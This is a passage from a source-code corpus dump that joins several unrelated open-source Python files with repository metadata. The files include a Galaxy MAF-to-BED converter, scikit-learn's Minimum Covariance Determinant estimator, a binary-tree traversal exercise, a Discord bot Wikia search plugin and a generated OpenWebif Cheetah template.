print "Simulation failed!"
### '''
|
pgleeson/TestArea
|
models/LarkumEtAl2009/pythonScripts/PAP_multibranches.py
|
Python
|
gpl-2.0
| 13,934
|
[
"NEURON"
] |
d5e31a5ff4edf928cdc955f92c7e4c05287b8987dcfd9b20d73deb5b29c03773
|
#!/usr/bin/env python
"""
Read a maf and output intervals for specified list of species.
"""
import sys, os, tempfile
from galaxy import eggs
import pkg_resources; pkg_resources.require( "bx-python" )
from bx.align import maf
assert sys.version_info[:2] >= ( 2, 4 )
def __main__():
input_filename = sys.argv[1]
output_filename = sys.argv[2]
#where to store files that become additional output
database_tmp_dir = './database/tmp' #os.path.join(os.path.split(os.path.split(os.path.realpath(output_filename))[0])[0],'tmp') #database/tmp
species = sys.argv[3].split(',')
partial = sys.argv[4]
out_files = {}
primary_spec = None
if "None" in species:
species = {}
try:
for i, m in enumerate( maf.Reader( open( input_filename, 'r' ) ) ):
for c in m.components:
spec,chrom = maf.src_split( c.src )
if not spec or not chrom:
spec = chrom = c.src
species[spec] = ""
species = species.keys()
except:
print >>sys.stderr, "Invalid MAF file specified"
return
if "?" in species:
print >>sys.stderr, "Invalid dbkey specified"
return
for i in range( 0, len( species ) ):
spec = species[i]
if i == 0:
out_files[spec] = open( output_filename, 'w' )
primary_spec = spec
else:
out_files[spec] = tempfile.NamedTemporaryFile( mode = 'w', dir = database_tmp_dir, suffix = '.maf_to_bed' )
filename = out_files[spec].name
out_files[spec].close()
out_files[spec] = open( filename, 'w' )
num_species = len( species )
print "Restricted to species:", ",".join( species )
file_in = open( input_filename, 'r' )
maf_reader = maf.Reader( file_in )
block_num = -1
for i, m in enumerate( maf_reader ):
block_num += 1
if "None" not in species:
m = m.limit_to_species( species )
l = m.components
if len(l) < num_species and partial == "partial_disallowed": continue
for c in l:
spec,chrom = maf.src_split( c.src )
if not spec or not chrom:
spec = chrom = c.src
if spec not in out_files.keys():
out_files[spec] = tempfile.NamedTemporaryFile( mode='w', dir = database_tmp_dir, suffix = '.maf_to_bed' )
filename = out_files[spec].name
out_files[spec].close()
out_files[spec] = open( filename, 'w' )
if c.strand == "-":
out_files[spec].write( chrom + "\t" + str( c.src_size - c.end ) + "\t" + str( c.src_size - c.start ) + "\t" + spec + "_" + str( block_num ) + "\t" + "0\t" + c.strand + "\n" )
else:
out_files[spec].write( chrom + "\t" + str( c.start ) + "\t" + str( c.end ) + "\t" + spec + "_" + str( block_num ) + "\t" + "0\t" + c.strand + "\n" )
file_in.close()
for file_out in out_files.keys():
out_files[file_out].close()
for spec in out_files.keys():
if spec != primary_spec:
print "#FILE\t" + spec + "\t" + os.path.join( database_tmp_dir, os.path.split( out_files[spec].name )[1] )
else:
print "#FILE1\t" + spec + "\t" + out_files[spec].name
if __name__ == "__main__": __main__()
|
dbcls/dbcls-galaxy
|
tools/maf/maf_to_bed.py
|
Python
|
mit
| 3,486
|
[
"Galaxy"
] |
14616c24758748d6b523790f93ab01b74730158e3649fabec64114029489437d
|
"""
Robust location and covariance estimators.
Here are implemented estimators that are resistant to outliers.
"""
# Author: Virgile Fritsch <virgile.fritsch@inria.fr>
#
# License: BSD 3 clause
import warnings
import numbers
import numpy as np
from scipy import linalg
from scipy.stats import chi2
from . import empirical_covariance, EmpiricalCovariance
from ..utils.extmath import fast_logdet, pinvh
from ..utils import check_random_state
# Minimum Covariance Determinant
# Implementing of an algorithm by Rousseeuw & Van Driessen described in
# (A Fast Algorithm for the Minimum Covariance Determinant Estimator,
# 1999, American Statistical Association and the American Society
# for Quality, TECHNOMETRICS)
def c_step(X, n_support, remaining_iterations=30, initial_estimates=None,
verbose=False, cov_computation_method=empirical_covariance,
random_state=None):
"""C_step procedure described in [Rouseeuw1984]_ aiming at computing MCD.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data set in which we look for the n_support observations whose
scatter matrix has minimum determinant.
n_support : int, > n_samples / 2
Number of observations to compute the robust estimates of location
and covariance from.
remaining_iterations : int, optional
Number of iterations to perform.
According to [Rouseeuw1999]_, two iterations are sufficient to get
close to the minimum, and we never need more than 30 to reach
convergence.
initial_estimates : 2-tuple, optional
Initial estimates of location and shape from which to run the c_step
procedure:
- initial_estimates[0]: an initial location estimate
- initial_estimates[1]: an initial covariance estimate
verbose : boolean, optional
Verbose mode.
random_state : integer or numpy.RandomState, optional
The random generator used. If an integer is given, it fixes the
seed. Defaults to the global numpy random number generator.
Returns
-------
location : array-like, shape (n_features,)
Robust location estimates.
covariance : array-like, shape (n_features, n_features)
Robust covariance estimates.
support : array-like, shape (n_samples,)
A mask for the `n_support` observations whose scatter matrix has
minimum determinant.
References
----------
.. [Rouseeuw1999] A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS
"""
random_state = check_random_state(random_state)
n_samples, n_features = X.shape
# Initialisation
if initial_estimates is None:
# compute initial robust estimates from a random subset
support = np.zeros(n_samples).astype(bool)
support[random_state.permutation(n_samples)[:n_support]] = True
location = X[support].mean(0)
covariance = cov_computation_method(X[support])
else:
# get initial robust estimates from the function parameters
location = initial_estimates[0]
covariance = initial_estimates[1]
# run a special iteration for that case (to get an initial support)
precision = pinvh(covariance)
X_centered = X - location
dist = (np.dot(X_centered, precision) * X_centered).sum(1)
# compute new estimates
support = np.zeros(n_samples).astype(bool)
support[np.argsort(dist)[:n_support]] = True
location = X[support].mean(0)
covariance = cov_computation_method(X[support])
previous_det = np.inf
# Iterative procedure for Minimum Covariance Determinant computation
det = fast_logdet(covariance)
while (det < previous_det) and (remaining_iterations > 0):
# save old estimates values
previous_location = location
previous_covariance = covariance
previous_det = det
previous_support = support
# compute a new support from the full data set mahalanobis distances
precision = pinvh(covariance)
X_centered = X - location
dist = (np.dot(X_centered, precision) * X_centered).sum(axis=1)
# compute new estimates
support = np.zeros(n_samples).astype(bool)
support[np.argsort(dist)[:n_support]] = True
location = X[support].mean(axis=0)
covariance = cov_computation_method(X[support])
det = fast_logdet(covariance)
# update remaining iterations for early stopping
remaining_iterations -= 1
previous_dist = dist
dist = (np.dot(X - location, precision) * (X - location)).sum(axis=1)
# Catch computation errors
if np.isinf(det):
raise ValueError(
"Singular covariance matrix. "
"Please check that the covariance matrix corresponding "
"to the dataset is full rank and that MinCovDet is used with "
"Gaussian-distributed data (or at least data drawn from a "
"unimodal, symmetric distribution.")
# Check convergence
if np.allclose(det, previous_det):
# c_step procedure converged
if verbose:
print("Optimal couple (location, covariance) found before"
" ending iterations (%d left)" % (remaining_iterations))
results = location, covariance, det, support, dist
elif det > previous_det:
# determinant has increased (should not happen)
warnings.warn("Warning! det > previous_det (%.15f > %.15f)"
% (det, previous_det), RuntimeWarning)
results = previous_location, previous_covariance, \
previous_det, previous_support, previous_dist
# Check early stopping
if remaining_iterations == 0:
if verbose:
print('Maximum number of iterations reached')
det = fast_logdet(covariance)
results = location, covariance, det, support, dist
return results
def select_candidates(X, n_support, n_trials, select=1, n_iter=30,
verbose=False,
cov_computation_method=empirical_covariance,
random_state=None):
"""Finds the best pure subset of observations to compute MCD from it.
The purpose of this function is to find the best sets of n_support
observations with respect to a minimization of their covariance
matrix determinant. Equivalently, it removes n_samples-n_support
observations to construct what we call a pure data set (i.e. not
containing outliers). The list of the observations of the pure
data set is referred to as the `support`.
Starting from a random support, the pure data set is found by the
c_step procedure introduced by Rousseeuw and Van Driessen in
[Rouseeuw1999]_.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data (sub)set in which we look for the n_support purest observations.
n_support : int, [(n + p + 1)/2] < n_support < n
The number of samples the pure data set must contain.
select : int, int > 0
Number of best candidates results to return.
n_trials : int, nb_trials > 0 or 2-tuple
Number of different initial sets of observations from which to
run the algorithm.
Instead of giving a number of trials to perform, one can provide a
list of initial estimates that will be used to iteratively run
c_step procedures. In this case:
- n_trials[0]: array-like, shape (n_trials, n_features)
is the list of `n_trials` initial location estimates
- n_trials[1]: array-like, shape (n_trials, n_features, n_features)
is the list of `n_trials` initial covariances estimates
n_iter : int, nb_iter > 0
Maximum number of iterations for the c_step procedure.
(2 is enough to be close to the final solution. "Never" exceeds 20).
random_state : integer or numpy.RandomState, optional
The random generator used. If an integer is given, it fixes the
seed. Defaults to the global numpy random number generator.
See Also
---------
`c_step` function
Returns
-------
best_locations : array-like, shape (select, n_features)
The `select` location estimates computed from the `select` best
supports found in the data set (`X`).
best_covariances : array-like, shape (select, n_features, n_features)
The `select` covariance estimates computed from the `select`
best supports found in the data set (`X`).
best_supports : array-like, shape (select, n_samples)
The `select` best supports found in the data set (`X`).
References
----------
.. [Rouseeuw1999] A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS
"""
random_state = check_random_state(random_state)
n_samples, n_features = X.shape
if isinstance(n_trials, numbers.Integral):
run_from_estimates = False
elif isinstance(n_trials, tuple):
run_from_estimates = True
estimates_list = n_trials
n_trials = estimates_list[0].shape[0]
else:
raise TypeError("Invalid 'n_trials' parameter, expected tuple or "
" integer, got %s (%s)" % (n_trials, type(n_trials)))
# compute `n_trials` location and shape estimates candidates in the subset
all_estimates = []
if not run_from_estimates:
# perform `n_trials` computations from random initial supports
for j in range(n_trials):
all_estimates.append(
c_step(
X, n_support, remaining_iterations=n_iter, verbose=verbose,
cov_computation_method=cov_computation_method,
random_state=random_state))
else:
# perform computations from every given initial estimates
for j in range(n_trials):
initial_estimates = (estimates_list[0][j], estimates_list[1][j])
all_estimates.append(c_step(
X, n_support, remaining_iterations=n_iter,
initial_estimates=initial_estimates, verbose=verbose,
cov_computation_method=cov_computation_method,
random_state=random_state))
all_locs_sub, all_covs_sub, all_dets_sub, all_supports_sub, all_ds_sub = \
zip(*all_estimates)
# find the `n_best` best results among the `n_trials` ones
index_best = np.argsort(all_dets_sub)[:select]
best_locations = np.asarray(all_locs_sub)[index_best]
best_covariances = np.asarray(all_covs_sub)[index_best]
best_supports = np.asarray(all_supports_sub)[index_best]
best_ds = np.asarray(all_ds_sub)[index_best]
return best_locations, best_covariances, best_supports, best_ds
def fast_mcd(X, support_fraction=None,
cov_computation_method=empirical_covariance,
random_state=None):
"""Estimates the Minimum Covariance Determinant matrix.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The data matrix, with p features and n samples.
support_fraction : float, 0 < support_fraction < 1
The proportion of points to be included in the support of the raw
MCD estimate. Default is None, which implies that the minimum
value of support_fraction will be used within the algorithm:
`[n_sample + n_features + 1] / 2`.
random_state : integer or numpy.RandomState, optional
The generator used to randomly subsample. If an integer is
given, it fixes the seed. Defaults to the global numpy random
number generator.
Notes
-----
The FastMCD algorithm has been introduced by Rousseuw and Van Driessen
in "A Fast Algorithm for the Minimum Covariance Determinant Estimator,
1999, American Statistical Association and the American Society
for Quality, TECHNOMETRICS".
The principle is to compute robust estimates and random subsets before
pooling them into a larger subsets, and finally into the full data set.
Depending on the size of the initial sample, we have one, two or three
such computation levels.
Note that only raw estimates are returned. If one is interested in
the correction and reweighting steps described in [Rouseeuw1999]_,
see the MinCovDet object.
References
----------
.. [Rouseeuw1999] A Fast Algorithm for the Minimum Covariance
Determinant Estimator, 1999, American Statistical Association
and the American Society for Quality, TECHNOMETRICS
.. [Butler1993] R. W. Butler, P. L. Davies and M. Jhun,
Asymptotics For The Minimum Covariance Determinant Estimator,
The Annals of Statistics, 1993, Vol. 21, No. 3, 1385-1400
Returns
-------
location : array-like, shape (n_features,)
Robust location of the data.
covariance : array-like, shape (n_features, n_features)
Robust covariance of the features.
support : array-like, type boolean, shape (n_samples,)
A mask of the observations that have been used to compute
the robust location and covariance estimates of the data set.
"""
random_state = check_random_state(random_state)
X = np.asarray(X)
if X.ndim == 1:
X = np.reshape(X, (1, -1))
warnings.warn("Only one sample available. "
"You may want to reshape your data array")
n_samples, n_features = X.shape
# minimum breakdown value
if support_fraction is None:
n_support = int(np.ceil(0.5 * (n_samples + n_features + 1)))
else:
n_support = int(support_fraction * n_samples)
# 1-dimensional case quick computation
# (Rousseeuw, P. J. and Leroy, A. M. (2005) References, in Robust
# Regression and Outlier Detection, John Wiley & Sons, chapter 4)
if n_features == 1:
if n_support < n_samples:
# find the sample shortest halves
X_sorted = np.sort(np.ravel(X))
diff = X_sorted[n_support:] - X_sorted[:(n_samples - n_support)]
halves_start = np.where(diff == np.min(diff))[0]
# take the middle points' mean to get the robust location estimate
location = 0.5 * (X_sorted[n_support + halves_start]
+ X_sorted[halves_start]).mean()
support = np.zeros(n_samples, dtype=bool)
X_centered = X - location
support[np.argsort(np.abs(X - location), 0)[:n_support]] = True
covariance = np.asarray([[np.var(X[support])]])
location = np.array([location])
# get precision matrix in an optimized way
precision = pinvh(covariance)
dist = (np.dot(X_centered, precision) * (X_centered)).sum(axis=1)
else:
support = np.ones(n_samples, dtype=bool)
covariance = np.asarray([[np.var(X)]])
location = np.asarray([np.mean(X)])
X_centered = X - location
# get precision matrix in an optimized way
precision = pinvh(covariance)
dist = (np.dot(X_centered, precision) * (X_centered)).sum(axis=1)
# Starting FastMCD algorithm for p-dimensional case
if (n_samples > 500) and (n_features > 1):
# 1. Find candidate supports on subsets
# a. split the set in subsets of size ~ 300
n_subsets = n_samples // 300
n_samples_subsets = n_samples // n_subsets
samples_shuffle = random_state.permutation(n_samples)
h_subset = int(np.ceil(n_samples_subsets *
(n_support / float(n_samples))))
# b. perform a total of 500 trials
n_trials_tot = 500
# c. select 10 best (location, covariance) for each subset
n_best_sub = 10
n_trials = max(10, n_trials_tot // n_subsets)
n_best_tot = n_subsets * n_best_sub
all_best_locations = np.zeros((n_best_tot, n_features))
try:
all_best_covariances = np.zeros((n_best_tot, n_features,
n_features))
except MemoryError:
# The above is too big. Let's try with something much small
# (and less optimal)
all_best_covariances = np.zeros((n_best_tot, n_features,
n_features))
n_best_tot = 10
n_best_sub = 2
for i in range(n_subsets):
low_bound = i * n_samples_subsets
high_bound = low_bound + n_samples_subsets
current_subset = X[samples_shuffle[low_bound:high_bound]]
best_locations_sub, best_covariances_sub, _, _ = select_candidates(
current_subset, h_subset, n_trials,
select=n_best_sub, n_iter=2,
cov_computation_method=cov_computation_method,
random_state=random_state)
subset_slice = np.arange(i * n_best_sub, (i + 1) * n_best_sub)
all_best_locations[subset_slice] = best_locations_sub
all_best_covariances[subset_slice] = best_covariances_sub
# 2. Pool the candidate supports into a merged set
# (possibly the full dataset)
n_samples_merged = min(1500, n_samples)
h_merged = int(np.ceil(n_samples_merged *
(n_support / float(n_samples))))
if n_samples > 1500:
n_best_merged = 10
else:
n_best_merged = 1
# find the best couples (location, covariance) on the merged set
selection = random_state.permutation(n_samples)[:n_samples_merged]
locations_merged, covariances_merged, supports_merged, d = \
select_candidates(
X[selection], h_merged,
n_trials=(all_best_locations, all_best_covariances),
select=n_best_merged,
cov_computation_method=cov_computation_method,
random_state=random_state)
# 3. Finally get the overall best (locations, covariance) couple
if n_samples < 1500:
# directly get the best couple (location, covariance)
location = locations_merged[0]
covariance = covariances_merged[0]
support = np.zeros(n_samples, dtype=bool)
dist = np.zeros(n_samples)
support[selection] = supports_merged[0]
dist[selection] = d[0]
else:
# select the best couple on the full dataset
locations_full, covariances_full, supports_full, d = \
select_candidates(
X, n_support,
n_trials=(locations_merged, covariances_merged),
select=1,
cov_computation_method=cov_computation_method,
random_state=random_state)
location = locations_full[0]
covariance = covariances_full[0]
support = supports_full[0]
dist = d[0]
elif n_features > 1:
# 1. Find the 10 best couples (location, covariance)
# considering two iterations
n_trials = 30
n_best = 10
locations_best, covariances_best, _, _ = select_candidates(
X, n_support, n_trials=n_trials, select=n_best, n_iter=2,
cov_computation_method=cov_computation_method,
random_state=random_state)
# 2. Select the best couple on the full dataset amongst the 10
locations_full, covariances_full, supports_full, d = select_candidates(
X, n_support, n_trials=(locations_best, covariances_best),
select=1, cov_computation_method=cov_computation_method,
random_state=random_state)
location = locations_full[0]
covariance = covariances_full[0]
support = supports_full[0]
dist = d[0]
return location, covariance, support, dist
class MinCovDet(EmpiricalCovariance):
"""Minimum Covariance Determinant (MCD): robust estimator of covariance.
The Minimum Covariance Determinant covariance estimator is to be applied
on Gaussian-distributed data, but could still be relevant on data
drawn from a unimodal, symmetric distribution. It is not meant to be used
with multi-modal data (the algorithm used to fit a MinCovDet object is
likely to fail in such a case).
One should consider projection pursuit methods to deal with multi-modal
datasets.
Parameters
----------
store_precision : bool
Specify if the estimated precision is stored.
assume_centered : Boolean
If True, the support of the robust location and the covariance
estimates is computed, and a covariance estimate is recomputed from
it, without centering the data.
Useful to work with data whose mean is significantly equal to
zero but is not exactly zero.
If False, the robust location and covariance are directly computed
with the FastMCD algorithm without additional treatment.
support_fraction : float, 0 < support_fraction < 1
The proportion of points to be included in the support of the raw
MCD estimate. Default is None, which implies that the minimum
value of support_fraction will be used within the algorithm:
[n_sample + n_features + 1] / 2
random_state : integer or numpy.RandomState, optional
The random generator used. If an integer is given, it fixes the
seed. Defaults to the global numpy random number generator.
Attributes
----------
`raw_location_` : array-like, shape (n_features,)
The raw robust estimated location before correction and re-weighting.
`raw_covariance_` : array-like, shape (n_features, n_features)
The raw robust estimated covariance before correction and re-weighting.
`raw_support_` : array-like, shape (n_samples,)
A mask of the observations that have been used to compute
the raw robust estimates of location and shape, before correction
and re-weighting.
`location_` : array-like, shape (n_features,)
Estimated robust location
`covariance_` : array-like, shape (n_features, n_features)
Estimated robust covariance matrix
`precision_` : array-like, shape (n_features, n_features)
Estimated pseudo inverse matrix.
(stored only if store_precision is True)
`support_` : array-like, shape (n_samples,)
A mask of the observations that have been used to compute
the robust estimates of location and shape.
`dist_` : array-like, shape (n_samples,)
Mahalanobis distances of the training set (on which `fit` is called)
observations.
References
----------
.. [Rouseeuw1984] `P. J. Rousseeuw. Least median of squares regression.
J. Am Stat Ass, 79:871, 1984.`
.. [Rouseeuw1999] `A Fast Algorithm for the Minimum Covariance Determinant
Estimator, 1999, American Statistical Association and the American
Society for Quality, TECHNOMETRICS`
.. [Butler1993] `R. W. Butler, P. L. Davies and M. Jhun,
Asymptotics For The Minimum Covariance Determinant Estimator,
The Annals of Statistics, 1993, Vol. 21, No. 3, 1385-1400`
"""
_nonrobust_covariance = staticmethod(empirical_covariance)
def __init__(self, store_precision=True, assume_centered=False,
support_fraction=None, random_state=None):
self.store_precision = store_precision
self.assume_centered = assume_centered
self.support_fraction = support_fraction
self.random_state = random_state
def fit(self, X, y=None):
"""Fits a Minimum Covariance Determinant with the FastMCD algorithm.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training data, where n_samples is the number of samples
and n_features is the number of features.
y : not used, present for API consistence purpose.
Returns
-------
self : object
Returns self.
"""
random_state = check_random_state(self.random_state)
n_samples, n_features = X.shape
# check that the empirical covariance is full rank
if (linalg.svdvals(np.dot(X.T, X)) > 1e-8).sum() != n_features:
warnings.warn("The covariance matrix associated to your dataset "
"is not full rank")
# compute and store raw estimates
raw_location, raw_covariance, raw_support, raw_dist = fast_mcd(
X, support_fraction=self.support_fraction,
cov_computation_method=self._nonrobust_covariance,
random_state=random_state)
if self.assume_centered:
raw_location = np.zeros(n_features)
raw_covariance = self._nonrobust_covariance(X[raw_support],
assume_centered=True)
# get precision matrix in an optimized way
precision = pinvh(raw_covariance)
raw_dist = np.sum(np.dot(X, precision) * X, 1)
self.raw_location_ = raw_location
self.raw_covariance_ = raw_covariance
self.raw_support_ = raw_support
self.location_ = raw_location
self.support_ = raw_support
self.dist_ = raw_dist
# obtain consistency at normal models
self.correct_covariance(X)
# re-weight estimator
self.reweight_covariance(X)
return self
def correct_covariance(self, data):
"""Apply a correction to raw Minimum Covariance Determinant estimates.
Correction using the empirical correction factor suggested
by Rousseeuw and Van Driessen in [Rouseeuw1984]_.
Parameters
----------
data : array-like, shape (n_samples, n_features)
The data matrix, with p features and n samples.
The data set must be the one which was used to compute
the raw estimates.
Returns
-------
covariance_corrected : array-like, shape (n_features, n_features)
Corrected robust covariance estimate.
"""
correction = np.median(self.dist_) / chi2(data.shape[1]).isf(0.5)
covariance_corrected = self.raw_covariance_ * correction
self.dist_ /= correction
return covariance_corrected
def reweight_covariance(self, data):
"""Re-weight raw Minimum Covariance Determinant estimates.
Re-weight observations using Rousseeuw's method (equivalent to
deleting outlying observations from the data set before
computing location and covariance estimates). [Rouseeuw1984]_
Parameters
----------
data : array-like, shape (n_samples, n_features)
The data matrix, with p features and n samples.
The data set must be the one which was used to compute
the raw estimates.
Returns
-------
location_reweighted : array-like, shape (n_features, )
Re-weighted robust location estimate.
covariance_reweighted : array-like, shape (n_features, n_features)
Re-weighted robust covariance estimate.
support_reweighted : array-like, type boolean, shape (n_samples,)
A mask of the observations that have been used to compute
the re-weighted robust location and covariance estimates.
"""
n_samples, n_features = data.shape
mask = self.dist_ < chi2(n_features).isf(0.025)
if self.assume_centered:
location_reweighted = np.zeros(n_features)
else:
location_reweighted = data[mask].mean(0)
covariance_reweighted = self._nonrobust_covariance(
data[mask], assume_centered=self.assume_centered)
support_reweighted = np.zeros(n_samples).astype(bool)
support_reweighted[mask] = True
self._set_covariance(covariance_reweighted)
self.location_ = location_reweighted
self.support_ = support_reweighted
X_centered = data - self.location_
self.dist_ = np.sum(
np.dot(X_centered, self.get_precision()) * X_centered, 1)
return location_reweighted, covariance_reweighted, support_reweighted
|
treycausey/scikit-learn
|
sklearn/covariance/robust_covariance.py
|
Python
|
bsd-3-clause
| 28,528
|
[
"Gaussian"
] |
e3afca6b9f085401bcac78ae83834240792c1bcf473d39dd4440dcaba983f7ec
|
class Node:
left = None
right = None
def __init__(self, data):
self.data = data
def triangleTransverse(root, result):
result.append(root)
visitLeft(root.left, True, result)
visitRight(root.right, True, result)
def visitLeft(root, visit, result):
if root == None:
return
if visit or (root.left == None and root.right == None):
result.append(root)
visitLeft(root.left, True, result)
visitLeft(root.right, False, result)
def visitRight(root, visit, result):
if root == None:
return
visitRight(root.left, False, result)
visitRight(root.right, True, result)
if visit or (root.left == None and root.right == None):
result.append(root)
def generateBST(data, rootPos):
if rootPos >= len(data):
return None
root = Node(data[rootPos])
root.left = generateBST(data, 2 * rootPos + 1)
root.right = generateBST(data, 2 * rootPos + 2)
return root
if __name__ == '__main__':
data = [x for x in range(15)]
root = generateBST(data, 0)
print(data)
result = []
triangleTransverse(root, result)
print([x.data for x in result])
|
yubinbai/python_practice
|
triangleTransverse.py
|
Python
|
apache-2.0
| 1,165
|
[
"VisIt"
] |
d408efb3a718adf3c35dff2d66d35813f0231276ffc1dbba1c21a42f50322d66
|
# Copyright 2017 Starbot Discord Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Use the Wikia API to get Definitions'''
from api import command, message, plugin
from api.wikia import Wikia
import discord
import traceback
def wikia_get(wiki, search):
'''Fetch and return data from Wikia'''
starwiki = Wikia(wiki)
try:
results = starwiki.wikia_search(search)
page = starwiki.wikia_getpage(results[0]['id'])
section = page[0]
resultid = results[0]['id']
details = starwiki.wikia_getdetails(results[0]['id'])
# Some really stupid hacks to get the main image
img_thumb = details[str(resultid)]['thumbnail']
img_stuff = img_thumb.split("window-crop", 1)
img_stuff2 = img_stuff[1].split("?")
img = img_stuff[0][:-1] + "?" + img_stuff2[1]
except Exception as exc:
print(exc)
print(traceback.format_exc())
return message.Message("No result found for '{}'".format(search))
if len(section['content']) < 1:
return message.Message(body="No result found for '{}'".format(search))
embed = discord.Embed(color=discord.Color.green())
embed.set_author(name="Visit the full page here",
url=results[0]['url'],
icon_url='http://slot1.images.wikia.nocookie.net/__cb1493894030/common/skins/common/images/wiki.png')
embed.add_field(name=section['title'], value=section['content'][0]['text'])
embed.set_image(url=img)
return message.Message(embed=embed)
def onInit(plugin_in):
starwiki_command = command.Command(plugin_in, 'starwiki', shortdesc='Search the Star VS. Wikia')
wikia_command = command.Command(plugin_in, 'wikia', shortdesc='Search Wikia!')
return plugin.Plugin(plugin_in, 'starwiki', [starwiki_command, wikia_command])
async def onCommand(message_in):
if message_in.command == 'starwiki':
if message_in.body == '':
return message.Message(body='Usage:\nstarwiki [search term]')
else:
if message_in.body.startswith(" "):
message_in.body = message_in.body[1:]
return wikia_get('starvstheforcesofevil', message_in.body)
if message_in.command == 'wikia':
if message_in.body == '':
return message.Message(body='Usage:\nwikia [wikia name] [search term]')
input_split = message_in.body.split(' ', 2)
print(input_split)
if len(input_split) != 3:
return message.Message(body='Usage:\nwikia [wikia name] [search term]')
return wikia_get(input_split[1], input_split[2])
|
dhinakg/BitSTAR
|
plugins/wikia.py
|
Python
|
apache-2.0
| 3,152
|
[
"VisIt"
] |
cd0e315c66cc30952730309c0307c5211edca9109579a9a3fbbce515a5ab6e05
|
#!/usr/bin/env python
##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
import builtins as builtin
except ImportError:
import __builtin__ as builtin
from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers
##################################################
## MODULE CONSTANTS
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1364979192.66491
__CHEETAH_genTimestamp__ = 'Wed Apr 3 17:53:12 2013'
__CHEETAH_src__ = '/home/fermi/Work/Model/tmsingle/openpli3.0/build-tmsingle/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-0.1+git1+279a2577c3bc6defebd4bf9e61a046dcf7f37c01-r0.72/git/plugin/controllers/views/web/mediaplayerremove.tmpl'
__CHEETAH_srcLastModified__ = 'Wed Apr 3 17:10:17 2013'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
raise AssertionError(
'This template was compiled with Cheetah version'
' %s. Templates compiled before version %s must be recompiled.'%(
__CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
class mediaplayerremove(Template):
##################################################
## CHEETAH GENERATED METHODS
def __init__(self, *args, **KWs):
super(mediaplayerremove, self).__init__(*args, **KWs)
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
def respond(self, trans=None):
## CHEETAH: main method generated for this template
if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
trans = self.transaction # is None unless self.awake() was called
if not trans:
trans = DummyTransaction()
_dummyTrans = True
else: _dummyTrans = False
write = trans.response().write
SL = self._CHEETAH__searchList
_filter = self._CHEETAH__currentFilter
########################################
## START - generated method body
_orig_filter_59764951 = _filter
filterName = u'WebSafe'
if self._CHEETAH__filters.has_key("WebSafe"):
_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]
else:
_filter = self._CHEETAH__currentFilter = \
self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter
write(u'''<?xml version="1.0" encoding="UTF-8"?>
<e2simplexmlresult>
\t<e2state>''')
_v = VFFSL(SL,"result",True) # u'$result' on line 4, col 11
if _v is not None: write(_filter(_v, rawExpr=u'$result')) # from line 4, col 11.
write(u'''</e2state>
\t<e2statetext>''')
_v = VFFSL(SL,"message",True) # u'$message' on line 5, col 15
if _v is not None: write(_filter(_v, rawExpr=u'$message')) # from line 5, col 15.
write(u'''</e2statetext>
</e2simplexmlresult>
''')
_filter = self._CHEETAH__currentFilter = _orig_filter_59764951
########################################
## END - generated method body
return _dummyTrans and trans.response().getvalue() or ""
##################################################
## CHEETAH GENERATED ATTRIBUTES
_CHEETAH__instanceInitialized = False
_CHEETAH_version = __CHEETAH_version__
_CHEETAH_versionTuple = __CHEETAH_versionTuple__
_CHEETAH_genTime = __CHEETAH_genTime__
_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__
_CHEETAH_src = __CHEETAH_src__
_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__
_mainCheetahMethod_for_mediaplayerremove= 'respond'
## END CLASS DEFINITION
if not hasattr(mediaplayerremove, '_initCheetahAttributes'):
templateAPIClass = getattr(mediaplayerremove, '_CHEETAH_templateClass', Template)
templateAPIClass._addCheetahPlumbingCodeToClass(mediaplayerremove)
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
from Cheetah.TemplateCmdLineIface import CmdLineIface
CmdLineIface(templateObj=mediaplayerremove()).run()
|
pli3/Openwebif
|
plugin/controllers/views/web/mediaplayerremove.py
|
Python
|
gpl-2.0
| 5,282
|
[
"VisIt"
] |
b3f1764f424cbd6e4d7affbdc2203b6637a4c14afe74ebe3253621131947a2b1
|
""" NOTA BENE: This agent should NOT be run alone. Instead, it serves as a base class for extensions.
The TaskManagerAgentBase is the base class to submit tasks to external systems,
monitor and update the tasks and file status in the transformation DB.
This agent is extended in WorkflowTaskAgent and RequestTaskAgent.
